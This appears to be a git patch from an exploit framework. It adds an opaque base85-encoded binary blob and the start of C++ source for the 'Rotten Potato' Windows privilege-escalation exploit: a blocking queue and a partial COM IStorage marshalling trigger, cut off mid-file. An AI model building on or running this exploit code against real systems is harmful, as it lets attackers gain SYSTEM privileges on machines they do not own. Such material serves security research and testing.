zlCkBpT#sx;LC$%sRr$etfVf{IW6PGcUJP_5g7QFQ+iRz7Jq^;6kVZ0e$os%jNtfa& z&k~tEisQ!u=$FZ4Y0OrFuLj9|AUUcZI^_Atbt&x#inVp?gri+BtIvR9OXlY z+-JEirRk7wjLaVCB!SNa@jgK^wtSQ8k*!sbTV-Wy8~9S0Et0WiORh(@Dj-*5W$P~4 znONr+$=I?b*CSiEAr}BW3ezFBKlm7#Et0WiORh({Ub}D}w6awQewEA?$=I?b*CSi$ zkgKq=RRz9AW{YHO*^=v#t(}nT@SJ5CJ;4Wncsr7eEn9LuvULM;IxAad@C7nkBxB2# zT#syd?#A!=tZbEmuK?9Z@g!r*7U?A*jqK1N@5heM*Ts`=8}QtoC@lRWeYq?}&p=$H zOrQEg9QY&20udLvus`_(+gE50az2>5$j0T$j=cAZM1@BfsW=UnIp*I?2%?w##XsW&vB3KeB6@i;z`#XJhw;r@*@EHN|`L>9}PYMWR~Jd z##a8MmtIf)g_17iL%PK>dlbiyrO@9mlcjd40AB^V3sPuVIY`b{yO3^qJ^r= z^#CuodAA0DOc2jn`Go&dQrnH{QwO7PX7 z2Ow^bdfCU~}(n=p@u#`&*~+YjcXHL+(F|!CD4^YC9(!@^DdkIk(B7^G;M?eJ_a&0&Z7BDR z+u&((yOa+d6QP>`yNqLNDe2(zKubYp*tM$n{9S z0CG#MY?XlD3F6liBxB2#T#sxeL9W`$RxS7kGFv2L%a&Y^Y$+k{PD$otK1DV?QY{T6Z$ zWO0J#|+Ky>eN86>u05lRb7gP*747v_#e%M|J0*wRB0Br-E z1vwqD7d%13Krewl0@Z+?I*Pgh6@vDFE`b^yvln`U;y^Efwt$X;YCugtvlse-CW5Ac zR)9VPRf6t0vL8CyUV&B*uMty1~0vS{F*gTC-YEB%D&*$RfofC)04jOGR zoAuc-V!Tg|E}1odV;Co*pD)n^@xc*s(bz>IXb|?nCr-^CI{Jyapg~;mX80+_Wr_Q| ztImEG~lLye#A5DK5ZLcRa;~Si}tx?I{sQou1hnBHD|#loNGhEaGBB z-8joQ8iqmw;_Cd1NuanSOSuG6)>+1hd8Av!#ff=jTE>ZTIf#py4xjO1EwfhKr-1h; zbKXPT?T)<^!XmrJai%;bDv0|(a8hEr9@D2!*CnH>g}d1ftnQ8G6pta{V%`rd;>L@4 z3kI279Fudjh+}fjh)XA*#Ed=is2*|_IS7%Ix1Kq(`!xsg_fk?Hpq~Z^9SR-9y(m(g zKgD?=PS#ffC@$&^2SMWkTdeGFZ-+T!zwUUd1?YBUyBF zA)x_T_r3ORq|+D3?JsITCrOee`=t%Y7E1O%`Or?Zk7f{VG@w%k9f%2}L%wlcimUIS za~sLVe#~?y0C^pF<~+H+dP=fXe-ob|OL^D&iNjVXf*hU8wgJmQS4nRQ%ZK)1kSzH_ zNPC>-aXlMpyM39>QmZuD9~Ca?owJd4Nz&s!c_DvllMwO)L{3CXdkeTPWb^MJmLJ#C zL6+LZ3@ns%!HRn*2<5tpV5Up^Fs#!yOKIHhe#vfym0j8+VXd19-G@?rRZ7VDxr11q zoIh)o?lRaiU9RtmkNym%5C7n(PruqKyfb-f`nR*`$vTT*pX@D_ z@}WMWY(S@-%%_|NWG6zF%A6syzp4S91F|t!*?{aPGG87%L6*wM+bG1$#zG{Jk4t(E zPcq~yA+=9&nq}MONP075di2bl$6zfjs1j`ozGEJw?(9Dp`eG+~F zq`8X5U_}GE0mzTf)6Th1&gY^H-vS!YnQlWTy#XCwb}HYh24q*u>{ESmT`GHd1G-UC zJyAZ6Q=eS+Yv?l&6KZ9BQqh1;JDGi51F{8D+bxiEsND-2&}k_vJ3luad4i7Uzcl|l zPhe z4rHl*-OE@#cuE)oB;TkG${MgSPnMr!zNP=xzD$*6&?`yx-Ga1Ck+M38~+2*>BnJLnOUOnI7$T zAbGjoYtSRU`=PpdoOt=Xlteac9K0VCp}r`&7)WtDr23;dZB+xhe@U{WckT(YNPc|% zvK#)%dG+6{>=f4%VeVUVUt^wJ}GTFigWUtC(_ctKBOx6y3 z%+@rZLuIrsYv&nHF00q4|E!;w26Xnye53phN#&w;p7R7s310xoId;I?lIebwez-&(o;S5h-Ak*R=*= zii@FqWCz93!Tl*hI+de@CqkvYrVBrdd@FO9JzjcpnawtI5*pC?OjeFX4alyO$(A-C>we^)^?$Viotv;vP5PIV5B13o z1y3&X3LE)EH=vUW9o}{Y4ai2=u)pmII^;heSGAC%GCUx8Xm9YyE0Xj|WO}sc$Xc%&dgS*R)Cr}1E7c>F zv5a(W9DF=F9A!GqfqV?#Zb0XrBuh3tXFu8gX_;)?6J#lGx+X1of((^$oaC<#Ncm?< zJRzMUrUB_XZ#IzRgMhqGoo&GOR++5u@{`Ne?O2^%uLfizWwHqk$gYsd&S^l_Ad}tM zfULu3{~Y&K4e0Q5el_x;y5!e6RL^d6o?JgYksrhaA0Y2n(NECf>o=9ihx9lfyNLDe zI2-=2dV)Rjm+Ww)FdfuqXk6TeF5TEUgHxjm}u3}_13vB3} zmGrp3^71%-ZRh3;qP%#zb$|Hd8afPK{mC7qmpMS^BZ6WAM`u*<`IacXM ztlDR-Gt;L$jRGJ+W`Zv2iIsJZ@C#O$rK>wWv()aeYv@dTj z@^4vx%XDl12M4lr-rm;trTYe0>Ra1yu6c5L%Sg*~`TRltISjK*w{D*a6D-rM^*2nk zOt<#$Qi^4|bw7Fds%5&he!}bQ+(f?eaYSJ{XnfL`tA3Tu_53-_#_jeN^T9Rne5~(> zEa_DM0gn%gBl|(2Wg3oT{1Fv)5-Lt)tGzH#KqBuf+nTik~vgefk^%09)B{&m?o zW3!bEM8tz+H7qFpAGW1oAI{2rxGMQ@+sZ!KrK7&_8o$f3z2yCQ$ZmVLi6Ca7uDyH~ zJBW2a?_MJ+!n5SFAUDJp;{|C+(9nPiKs)h5wZd|wbwZuFgTTAvmJ7c>)^3)WjJbeWlgTCIq%iq~jHg%8vuj7M64&9w0FF$#@`$0!0#17hI=B%#Da zZLZmnlBqS}WpEj0KaEY(2}8(WYDTthL|pXn0r_UV$%bHf_`s-`@W?2V&DKw=dkcjP zSw&R1pvJb76urqb!kn4)Z)}>(TBA8)pgjW*1pilV5BtVQF}je4!lw!*N- z3V6rH6P>oOZXx_{?3*)EVjC_&#Nc5u;R#fQC<9lq$je44>XgjJjI=bpF%s2eLry9{ z;^@cQe4?@c2Q?WWRJ~69lpRIbGqLluy`U+qi>pLjn@W3ej|GkU+ExB0!;^%fiDGV-gXcMfe!(BfjWblfbOoq z`$#}lpmNY2&??YuP!8yM&}h&gPyomSWWUrw=mhcuMT2yp>7b>c5>N%G3iK=JFOc(F z4njMSJE%WsDCl`m4yXXM4D67(JDHpsrnLFfVs07ZeugC>EdgBF2SfVP3kKvkf-Ah+cXLU&LQ zXb@;LNCz^47J$}(c7w`56`(564bWd8N7R=ah>jU(2OWs^)zHxjQz_m*S%CMy6x5*o z@KVkKv~&Tc+5+4=(==Of4)F#c=KBIO2%31EkWfJS1CTZqv<&nCC=Qegq9aHcm8&=A z$LdpZjTz>Aj7{1+7H62Or|o0mDJl9KvsEJI+3*zGZx9+Qh_e2EJ~YF+*bmm5BXW&K zeYQD<%|pUyr`SxrK1Zk#@cJRGS__HcXB@L4 z#dQ_Jb(3;U%-a}a##FqrCrxh>w%bJ;43l$n9!HJQX6EY03gMAs!efT;Jf`CvK5<&p z#y? zGxh8>Snyyq#ZhMqM?>KBiR%`Mk(KR))7T81J|bOfj57?+%`|6F4-jTM#b>8$vvqiN z)WAF%I%pAOEWY(Nf@-JUWUW)2-k6nFk^1CZI%{$L1EepWD|2&(pr?%$Zt@X{N;0B}bJ5>l5+dmJ zSkmjkY8_Dmv5~OH%W14O!#v1fjKw&?Fi57&tpoFf7^m2bv}|oAi$F7zm=H*1XN`$L zX`q=#_=P;Mic1h{*^ovZ`f1i zd>-XAA~#DLm64XNHN2xV=pRc7j#*oYCgKO-lYe#1!8@0xKVXd4) zMGwr&ki_wXn{-*9rhY#{n}z95(ACAV77fS!x&vLFNHz!NLCVPix?`}78GV-`RyvKz zFq(6#X;Ieg zj-$<)@!8XG)h%coM{6@o`p4r|5JuTiok|@+NVTp#v9^-yVtGxYR!=)To)h8>e4-Hg zI$${Fuxj)d!(xTuGA24=xHgBKbKq4O*^D*oq+ut75iibP`8j%_#133|L=5(#*bRc? z;s_P8#PFaDqe+w;m3v98nUx6B{BC+@PD<~Gi@cUCmpFmsV)TJ4Lh+B z$wBt&LG<%0PGd1c=qXO9V)cQNAV6vS!1bYc5Kmzu+DjxqxQts3-m?i(fHa^aP#$OzXccHDs2o%U(*4ZV z3Ct4Ck#MPmB@!Ny@T`P9U-E~C3ElC0NzTi|cJ6ZS--qp?$IJHbwXh}yJ==Fy^;@x) zr?q11dX{Tjm%l)0(u97e!Q-8qNNd`Nlb1mrmfPF8-g2$$zsqymweQr~UEqp$@HEHo zubk@QxE#mYb@(0NM)vJ@J9|gx65Mtq&CZ|QO%m92nFZEuWH@VW^#clNUMvt1KN}DZ zZMd+(ohAR{|Ez~BN+aQi|583&lHUXQQ|qs;?<8DXU$b6(J*Pz;kL|y>PShCXg!96M z=P$Smi5DhapwVS{%=+@&rRsb5e$0zp(=z=(=iKT&m@W5ukN-Tc|HT^GPRq;3k8kJ*9}p2aaM0kWAw!2n4<9iyX4L4|xcD(+6UMQh$}pk- zi~sBG9&W6(^>z>U{~NXOf1_j294T)PTCev(1Q8uqG4HPWtYLadI%*(a4Eg$qKM!Em zvF5}B66O|JMpS;s&hI|z@G&NHW@3sVTZe@QLw4d+tuaH37eptDw=${P6um}=C5wzq ztX~_lv8;sUpOk!!2FsWY+n9JytCA#pQ)WJ-t?2 zV>0Wk%b3X4A1nmq`bI39;LfhzbUj}}kc`W9#Z2)b9&rUO^TNKrHdq~S! zi6*w5)o`z}EVI}*t!+H9SN#k9C-f?L9oWqKiM`1(Z!>ORP~KDnI+EP3*fvI^HXk2R znwH3Fl2@`^j@BLq&>i)^=(}v$rXdYW|HOORhE*(lCvn_sJ;|+q%4g^QYk684(f!-P zpvTGUOYM<3TJsW=FGM6+=EVV6t&&@XF=HwWRX1y-a@Q<0+QkIWj@=LV; z1iwa0-VE1fV}Za}Z=q#ni63IEWaYSpY@8v-fXO0%U>+Vh&a ziOTJBF}D7wVQcRZSaPbTBn|3{`Pn|9$#lomwdXX0aWa}Ug&uFv`H`I-tg6JKA3p9g zbw==#06m>It&7@_p4M#Erli+jKVxF0emB@?$jupm*A6sXFP1t_upNP{_0a};7$MK4 zo*XRu=pb!|@!x34>zvCQ|HE?NskX(1iOgnvVg#*E*6XrG{g2j*kA-wkQjysnQ&0WG z>eIxts_jl@ISwq_LehLf@h$xQM;$kiv)uO-HYFzJW+&6kMySoChd+4YZ&8_6{&GE& zJ~NdoTWiSk$;zNz5^0IkaNc;59G}xnkLOWLD;X*IiIesD|0O+K;^h8gv|0Aidh;}k zTOSflIr@~0R9gAQxVLgbUdC)ZZ@{!&=Q=Mm^?-kjUfVtxrecLYH`$b8%t+QJ);F_T z>Y}0OwDzR#V$okDd8?9G+DsIe@r}9SqprldE7tltv%DT?kA(E>u-*Y@As;~A4(rRy?D|J*e$&Vlk%0;fm+8 z(%AmDbAhaXNt%}3+9HpEd3dt-pXV`#)z;%qR$p=CdCB^ul|xo_#cW%ZzMdT9eZabo zM;i?FEe%-uWmD0zlgjg<@nTcuU$iMJo3(a5g|n)c#Kde|qZ-ZTj6{R@4By86Kiz-Q zy=jJy-*sBd3u7of1=~J&s=Qp3R(DolizM=NItO4e2`eFq$#gX;Eu+Zmat!9zIw^Q5 zEmVw2Onm&XHpXn!XyPG=Ee+TXBR<{3yS0p(D2?V{+0^{Q+G91jFY!a-vnOZcrCwHR zJ?MvQE00zD7#<(THVsm;rM=-=qbXgRDJCH8zjoLO9iRv*u+*nLvDja0Bi_Xk`*V;+ z?^v2?;~|n#otKsAP8S)tmQnTc^-=V4$Nh*whl?{+ulTq@-XXo*X(y9Tn`y|_t9s?@ zO}*4%&6+5&%~hY3oSE+q1KB23uUunxf4bDk(we-pGE$5NlOfgYjStK9*P60?ruz1B z$5ZBvR9q8Dn+{lRFy-#9G#hhG*fN!BkgRoYz?y$|Q4g9}KN5GeNjzeV^l3J_@_M{4 z%=9=>p8WVs8jbUJrh6v+SM}1GhGb90wm4%i_uLHH7iU7*Qt|CPeJ}UEkL@V?)}M>A zuZ2&_zK;tBb!A^(Z(uAN(Kd(G;%!K=Q?ymMD|#xt6q^(uDryw>6n%X|eTVyI_%85$ z&3Bb=iSK8=r+mNh{nq!I?_j^-erbM#1JeVu0%rt%8|WP58+0XTQ}BnuULjLM=7+TJ z=h@G%-`IZX{fzxO^?x>WOK3&tm!Z9te##cA{;DCWbk&QhwW?jJy{dz%R|OCb+kG~Jx~3)`hvPz{Xh*T-SJx~Kx0KS#j^^9LaSJ) z*rB+n_*2o;w~Mc@Z-{T0?{n~Yrtf;+r~M}QP4;`iZ;sz$zjysU@jL4Gr=OGmpZ?AP z?Evf{;IT7wNQ0ddBeXLRiWw&)gNJP)In;knmYY9^y?_t zJm&k8uZQ0#zkI)CekFe2`u*V-<3H1XK){56p9Ag$I0oth(}QLQEeKj1bUx^M(A}VB z!99Ze1Z#p5gJ%S<3@#1+D)?4#X4WaL&)rq*v_ttA9fOIsHHE?-<%Qbfa>s@&n~w$&u<=4uK$}7qrmA@!&Deo#D zDjiiW@V%|-DV4jbr^-v^rwUf7R1v7>5vn-VcvX^0ubQlyqMD|fp_;8)pjx7OQ?(rR zzfrYCwNtf6wO@5e^_l8~>Pyu*)g{$c)z7M%sy|fsRd!*G!kUJ)3hNN|bl5Xty~Fy3 z1%&kv(}WEQ8x}SyY;4$bVaZ|XVcB8ku>7!>!sdo83@Z#<7PcyEeb_r;+rxH+?F~B+ zb|mccu*$Hn!Y+ng3HveZM%b;eyI~K*9MmrA7V5U@PHJ~`PqmlY7p<*QN2sIJBh+!~ z@#;jiUOiboMLktLLp@u)K)qP~rh2)0t-3_LMZHtKN4-ydNR2N#tIw#P?0wyRpY8H`{lX?|k1CzFT~E`hM(N?t9YrlJC#HwZ4D( zy85;9>+09r&)=_~Uj)X%1V63cG`}@|hx{)3{p5Gk?=L?W{}%q;{r&t0_(%E2`X~FR z`m-ZyeAzz$4(f+rp`V7H3H>hgR_OiE4oZbGNI6uQrd*<2t=y#C zrTjwaq-rkqv~CzFv8q(`96efo4_daZ+5@c^p^jDS)YH|kt2e2)t9Pl7s>LtM#^7Bx zXclj@f>x2Cn2k}p$akCX9^ccx7kn@K-tuka*VM0zpReBtzqkB0_#N;&?)RL3s(-fs z7XJhONB#ehYO70tZ$NxNSwQo^@W6?I9|!&vcqcG8Xh_i9pw&Ugg6;(wg0}}Z4+#mG z5R#60=!KA3A#aAP4A~a4JLD6LvAljK`Zenx*MD9AxX?F4zX*L4>ZJ@<&Q$JH`m1!R zj_BKW!dk2Qs3X;{!u#XuZ`DE)c6z~YJ4GACF-2S7e!i=HzxQqK_oAPlf4qN&|3?20 z{D1Vn?QaV33M>!27I-)Csi35wte{VVjtBh~2QccMaq^uv$`u!_RN)Vm24HKQ1W(b0q2BB#ighnSch@K!FIfNEDvP*=w)oe(w8of1j1Tjorpd zu4tXP!#ve`z}m+a_7Yone(v1nY;scEh3x8fyznD0)z4vnE%nd#f9+rBUyUc;>fg?; zdW8M-vcH|(lN8wOlGW^p$Jhz|!QX>ed3cfh58WRnsgfrxkuH(eNwv}~sJvBbmtK(K z(pS>{@&Y_PPrg82kE1`z{of`hD+?4yIa|35r@RZNd`bC88CAxW1oa?wq55-miF!Wz zy;09n#5v*;v0AJ{uMOf}(Sid`h}qgayw%p0X@w-iP1+0E;rdzn z2JVJpEHaiER~XgCZAQ28j-i^%%sb64bDKG09$?M2POz%28?EhVHr+nKUTphLfm7{x z?kR4WdzHJ^z0R$5Z+GuokR*qD z50Y*#k|J+<+q~UqtJE*YBPZ7~bjPRttt8!mKjcsN(}Sd7eh_QsvjutSZSqzEv_>MsSy9Lrh{Otni zGHETTco(bwqjacz2f1{tHV|p^N&N-Ahh+M@{<%KK(2eEB>lo#?oxLDb?!axv%Iq}-LuJ&ef$IbgUJKKf5ZRO-|1hB5*x!c=$gD| z2~wW4QrZYZd@Ci8$}8kYl*`mE_0Q@T>WN~pSb@8Z2vs{>yB}BkO#e}zVazttjbjbN zIMK)>E6ee-b%sC}``erBpE_qczjL-Zhq=eOzi~IZe{grYyWKQapV#c;`;GXKFYPBM zqwS?~g?z1C$1dG0x8vF=ilUr?rvIqyuO5jL-!I-0v$XlzLQT<3?N?f{_Jw|daS3a9 zqFG_qnXj6knaiy)Yp#8Uz1{xYPIAt0%AK2>S=@_4_g;60`x~#{-{r^R;S>7&>5TNQ zG(>jnlyae@7vZC0l^+#L{grx?+MwQrbG@a0pnj_=;uoS)Y!=<(12N7nk=Y@aX{w&5 zFVolSx9gkrYh@GaqMPOtISu0eOm2R zKgP3uB90S*xR$*u;iP}VxsKMK(9beIH2=f;l)GNxtaBc47Pzjv*dGtq7lSF~->K38 z%8|;k%9%=ua=B8gyrtZzW|Ci3;(Av0Ua>}N(3-V4&b(V&rmxUbjZDKamg0lu#vJn~ z$mcvWX3evXwX%30WzK5n2FGGwKjBvUSB9^{UqFVhvqHL3x=w17{!M;a{#t%PIhgFs zWc^m_4W!>sjQRZ5Ta2y7gi&H%YaU@8#cweMaU@~xAsldVeY4r`ZHW4~Y4M+_76KmgkZ_rz^?o3F=MaPVtynr9GkL=vTAj*RU%0 z8IR&wx0>&mpW@(}RbgFcZM0_C57~1ew6nQWJZtmiI!hcR=8AN2f-rHT72*o9UThTiiRa1xA6S{wwd=Lp zw8ypAv}xpjp1xAQQQxY+ssEst88ybu#_zeVw~fznihayv^LVqs++ent&zSFXl?Pa- zS{GYw)*r36tsVHrbbF4yz|OQa+qX}*&$Q3A%k0(mI=kNfy**%mV1H!)9a`9J@9QKx zhdSxbQBIcQIj1@K&RNd+&SlOj=Vln8-FeOV#QD#Tj(3uGhIfv4p?9fQ;jQsDcz1a1-Wjmrqy9_&P2oMto)#%THCA~Q}i8_d_tOe?U8tZR5rPgw(`#ntwYcCzz^dx)pO zx`SS2a90q^pZvWQsAs0UOJ1m)sN^d5D9jc;QQby-HjbkUDam2Z$wP)e20 zm1XLatZ5?axEeZ%i?77ZTB~-v{(GGEOt}9`R;S*)&)i|nWDPt!&t7idV;|zk@K>#) zbN@Qrbh!NvZwvnV8hJh~7Cw+G%N=qb@8NZ>`*QVlwN=d5mg@!P8uJHp$ohevZ~|+Y zX9u{{+3p4??IHJd5-1NU2>*hM7>k`Ep9iyy%8AMbH*$nt#J z%NjELY4N7mEi$!}v?baV+Gei*HSKNfLp*whZm@r1gaHjPWuV zIKw=cmAS`SU{~4i*|VLc&fU&a&K%eEru!-WHh&ou|L;Mpe)4(_r(rI`p*BjJq`ykL zr6l=My!ttI$q`DRR4J`o<>$&0^*nX0`mFkjnhG7CCCWs&D?b(cXlH6SlhZr2{UM7@ z`U85u{*AuEC^H&ppIeO~W0pD3JlZ_bTw#`**O<4%f9>Y?<_ycV&WAA?tOu?Y9ALZ&;yfrBY22*&>%Va3N&%y|`Md(KczXYD2hbmYoYTPIu-wb4lux zoL{mh*W*0x&a=+j&JWIkP^9Ue?B>yFf9qDd>)Zxj{c-mtH_OZMPNM-X3}3HrTC9m5 zi{!=Xo9Yc(ihiDcxt?pp&3oa}H?4Q9gK-I;o^bKhZ-36&%6^#U&UO!Tk9Hk*iMz_Z z52eN3B=11)5Ks1e?-Vc3TjG^@SJ5zk=heYKk9p5SK(Bb8&?dj9;qU7op!fb^>LA!{*Bo-NOl zGimxuS(9E`(g$L#)~G+E$Bm23OU=v7E6vsB)v*5!<|SOq2Jcq-?w#IUG~Ufz*TdeU zu-U$TY;;nOwo(ug!iaLFDr@ugV{~1=i1mFKR{D#6l5whWu5qog#dr#(?=%iH)67Ch z;R*B4=3MIx`#ik!HTzwA2d-xz&qO8$W`@w+dXzG|4ff<;otkyTow5=c@^Y(pZuWw7?i$M?v>-RjDrm;-zur< zWoniBCsKT&cuBk`3biKabci;zliixCAE*DC4syA^j;v_VoAd|u|I|D5Kj^*s+i>M~ z`fmLl;~V2U<8fvV;hd(LBzw#HfQ-1%UctJ&NMAoJSP+~+mpeaL7i^$wZwtN%b_Ov% z$)tyCoX6TMqGPPUWB*OMTiQ&Ieo6YX^k1ycF1T~9e54%k9)2Mg$SdX5^6hdn4*w8D z_Llqwe)glhkCLGXC7H})K`Vu{B zm%1-$DTG7&xKLE!wZDViHSK(@T6<3WN=wjf{T%&i{T2OCLl`|~I!rLnUS^j&bpB{PnTjHemYA1 zW9a%-#x2%!c*|cQ!REe`=@G@?Um#IqB{t?yX*f_j^=7?9F7p zw#uptmiG#8`2;vxl@`Y_sdI^QB6|BrsbvbFYfoA>}bx6HfRFipwc-3**)7m@QZ1&HI`Vw}}ZvAl9!8gt^ z)*7E02br$9+#E2c!D%O3Z;)Qc+o#!Avwu2m$GOunNWnIyStsKm*LdrhQoZiIhjYyL zk0XO`44Q%-90C%}pB~KsuaO>=zLYZMMe^Bl3A^O4%2n!mb)&ikwREYk!cL!PXX{tN z*ZgWT&pgLGA7@x^K4;!wby|*HYJX|ChZpe z4*k#M)4SF@FT*>Ie4h~{GtasscpY7Q74G@!=~0hJkPeYD(M6v0Ym)JLsR6fpg>Lbg z^n)~8&Q)$vehRZ(sNSjOi66Poh1x?*U60Vam@+)eyl}q#Gh4CGw{Nf?wO2yao1Gob zkIp=%Hz$$?OWj{V20hFRcQL<7Wjc5+MD_yhbes3Fx6?b+zXry!gBJA4{jKM_OSrUQ z=`i^j8qG1v1xh*W@Hgc}y8or@xdwX7u=rZUv^m;xSm9eO3C$j^3-b6LeG6)RPG5+Z zTyHnpkJwMyv;8^2kzrHigF2?iYWT4)lezuW)77KJgW@x>3$~r1AE?iTGXniy+-fWL z?OoQy*mHxOf)5^EjSnbw((DOX>dM$c=5?Y?+NVxnuvUiYn7@(ksxW9?4@?vtf z!F!tP_{Q5v)9+!LJ-Opr$ha>8{wOcf?{YHjbrd{TcI9*Bo0&7d4*?vhoXkA&PUUgD z{s$$U3F0McBRlPH>Q9Bu%;h%ms`ySU)bh3am^h7Usk)=I#_7gyjT?48=6pJY7afK4>ug4$Be1t>V%pg5=D|ohAdM>8Z4Y4 zGGVt|ktd2pi718P%5m*Vnqsx65w)UD)T5f3YC}EObVO3c*%rzRU zCTok;${KcB-BvGTHfRmuonzJn{G4Q`*lBhK^L9bI&Vi*1>>|5_W>f*q*4TA+gWY6r zv0LqSe5%{-wfpTsd&ovWarQ2M^Ap~qf83!2HBn7clhqV8RZUaV)eJRL%~B2R4^u2zr*RcbY9SF6^k_4rC7iPMamwc%$S-06Pi#(B_s zfhZJ3|H2&|X38=u#+Wxuuu~JXL@h~6)>5=oCSB=ThL)*iX_6+GgSc9@mZRlrd8n!Y zZz*Cf!bt|RuX3$ItK@{I8Vaq|>a=>geIr@btZiW~-Kw=|?OKP{Npf|g#$K(DS@i%Z z7KcWLwGs3=#!PfVi|Gk^qMoED>nZR_8cjAs&(yPY3C}QfSI^c<^)k|~La$`HU9Hz} zhEk{3Lobc+OEaF*qPOa8dOIA`iR*QfF1>mm-a4QU(n^N(VSPj&g~-SC2|Z>c7>P!b zk!++GsYV*Jr3_{eSxjSvVH$l#zcFA88gaV9urXqc8e_&dQ-qkAU?!SL<|xVri`UXR!7^+AvWbl*59H^bhDH;Vry`bmB=-7D2k^V9tdKhw|hB~EWld@AWd)iMi zX9cA}Sx_ES1eLVJ>Y#?xp1PnuXkez;6f|?<(-O3D=F=W@1f4-w&# zDR~`@zCmh~nxp~PCr-*wNHIAq!-E15i3%Qegd>*RX5L2hK)-pmPV3uhi}wA~K5Q|^+x;o)BTeZM>) z55o6D@~}KYQy-JZrc~V9LWw;Epn~x zM^{5_wMv~*Wme;(&3233hKF_FVqN%HPvm3+cv&1b8|Iv7)Slq9G0{n4`jg_+Lqv@* zQM0>+#?tDxx$Vp-I^8bLAba4XK3dEGGaq~~#%IoO&;S2;$k@N=A31t1)1rL6Krhsb zID;wq7ahemee)#qWHSlHrlHm>lMTQrR>G|yPVs>~ryStj5UC*v=W=FTNo4eS_ zeeB{mJ9w1c8)N4tvuo3#Es5Ql4Qb`GON-f| z7K0*^A&7M7L4q8zp@w{jp%_{yhZL%zgn9^}S#5z2I_Nt+5W)Z_Tf@-UxEh1RlA*A4 z2uxzKoDGHL!wtnySUCh%4Sm%^Ud>Qfo9KYIdPJWXU~)MOGmOIviLgQ{oRA44nD9X^ zY)}Xnl)?m+@IWmr&#zyKZOe-GI|K<*Ed`Qzk$B3YkG&S#SGCi$Mr-YjHamXh+7 zBz!ID-bk{ykm?;IdJkznK#~uW;^QQEBI%tV_dB0)8{v%s6$!?vxSb;GP65 z!j;1O3zM%oa;0wkXdp_!F#9G`FAEaL9GYps0%6y~1C}JXB$r({IQ^F3T)99UI%s5<`2vMe) z={)h1X-Z};v%?~@jLCEbC$9}=quIt8c-U%&B1MKuOsCBVxHC5*&O)o4`CJVxrZMU< zoe^_}v^lB81Q;_5y3CHaGM}kN8Lg#(=G{u(PbPgI`94m%PbPaRCp)H-%TpjlPO($M z30#fS;52fw)9SSG{70V?cZQrXXPo&~f}7@M@f1k5o8#uX`KY|ot#a$!kPez4f{+D5 z3Wzf|iFwKBKEuo82_%8;i_rZf%T}ZN7IZ(!ti6%$V-cT*TpAMTB##zHx^IY>Gi1$4 z%8WynAybAlxrZZj$mWn5Ltd;Sl|wr0iMVheV!>E3pQDHOCq)DplHa7_3vvGnGB{Lw zJHFpT{`N%)JcjEhPcfc^+lNFKl3d7e^|*XUY{UU&HsR`R zds}o*)SM@jq{z=DQZ+B?edXk74KChDnzrKMU1Vw4sQXFM3H&>GZ;Q^vy>rOWvdFpX z$RfrWtrDIe47J~6HBWV}9xHAo zqXIW#vvPVuQ$%BZta@}tUC!rCMqZbN&t;SMWmCizx?2lb-_450N%;v_D|IU01*DZf zmF{IxzSlunEmO%JQhFbR6(h}ElDs%#>)I&4!?kXKqxz%l9$}SJ$m}q!3s~RkD4*L| z(>N=dG{r<=7VjaVFo`F5sBJ2LM?@028zydE#5~nxZ0i)|4D+023XRz%O-t#@4Rqs{ zC^-jdy$Mm{O{M1w)+dL=%x8VdaHb|aDO{I+TJI2zcZ{~1fG?%sOxa9E3vi@LylBhb z`N}YBkrGW*a#@3NCMiu;3w^hLYHE^5zuhx4$)?ZlnV3}DlRcx8UNOupI?EA`i`SI$ zG(m&YOyBKgZa(J3+;lh76>foBgs0TvCyn%sZZb4%6>)dWo#3g)Bpf9bH*s;2GFovR zO}L33+=7#I(|p6;8~4Vd1P%LcDsCe1licWOn=10Ng|^xsQ9>d;^#9aN4+%LMCM0uM zKI;>|NFyJmh!ji6#rlX1yQk=U94btiVsi;5%$p+fQWR4&#pTVYrZb}QfrtW=;BXUf zC?N$~{)zO4VC`hm&&3T&@qvbDY8{8)#?(oImLg&+nWD7zDK1Nn=-7?OINaq$5s%eG zbC~|U1QxcYSVY2m=qr!?T^h|*LgH$VXe->;$;?MGq8uwUij7kAQeo5@E$F3(=}02a z6r`|&^GU2K6w<-`ew@=zlQ~EwiPXU<=eU*1WTTKLQyOWP;cRS#tVyIrX0rN4JjGSV z+P9J{aq=YDO(jW6SoQFGeLK1JB`|qe2P#53|$O8PxjgtI!xdH zn%;!hJDIjwT({s^K$mN8$6d_5S3JfQ=h(&MMobG>6-MJwtb?{xyZs{YVnkD&LQ&X1ud{pCac{9>x}W-O)1Vk!c!}S zbe|5qT7sPWXeolVXkh1#>*+=z&Nf|8)2AKv;Y7A literal 0 HcmV?d00001 diff --git a/external/source/exploits/rottenpotato/BlockingQueue.h b/external/source/exploits/rottenpotato/BlockingQueue.h new file mode 100644 index 0000000000..e500d0916e --- /dev/null +++ b/external/source/exploits/rottenpotato/BlockingQueue.h @@ -0,0 +1,41 @@ +#pragma once +#include +#include +#include "stdafx.h" + +typedef std::mutex Mutex; +template class BlockingQueue{ +public: + void push(const ITEM& value) { // push + std::lock_guard lock(mutex); + queue.push(std::move(value)); + condition.notify_one(); + } + bool try_pop(ITEM& value) { // non-blocking pop + std::lock_guard lock(mutex); + if (queue.empty()) return false; + value = std::move(queue.front()); + queue.pop(); + return true; + } + ITEM wait_pop() { // blocking pop + std::unique_lock lock(mutex); + condition.wait(lock, [this] {return !queue.empty(); }); + ITEM const value = std::move(queue.front()); + queue.pop(); + return value; + } + bool empty() const { // queue is empty? + std::lock_guard lock(mutex); + return queue.empty(); + } + void clear() { // remove all items + ITEM item; + while (try_pop(item)); + } +private: + Mutex mutex; + std::queue queue; + std::condition_variable condition; +}; + diff --git a/external/source/exploits/rottenpotato/IStorageTrigger.cpp b/external/source/exploits/rottenpotato/IStorageTrigger.cpp new file mode 100644 index 0000000000..06b9b7361b --- /dev/null +++ b/external/source/exploits/rottenpotato/IStorageTrigger.cpp @@ -0,0 +1,143 @@ +#include "stdafx.h" +#include "IStorageTrigger.h" +#include +#include + +IStorageTrigger::IStorageTrigger(IStorage *istg) { + _stg = istg; + m_cRef = 1; + return; +} + +HRESULT IStorageTrigger::DisconnectObject(DWORD dwReserved) { + return 0; +} +HRESULT IStorageTrigger::GetMarshalSizeMax(const IID &riid, void *pv, DWORD dwDestContext, void *pvDestContext, DWORD mshlflags, DWORD *pSize) { + *pSize = 1024; + return 0; +} +HRESULT IStorageTrigger::GetUnmarshalClass(const IID &riid, void *pv, DWORD dwDestContext, void *pvDestContext, DWORD mshlflags, CLSID *pCid) { + CLSIDFromString(OLESTR("{00000306-0000-0000-c000-000000000046}"), pCid); + return 0; +} +HRESULT IStorageTrigger::MarshalInterface(IStream 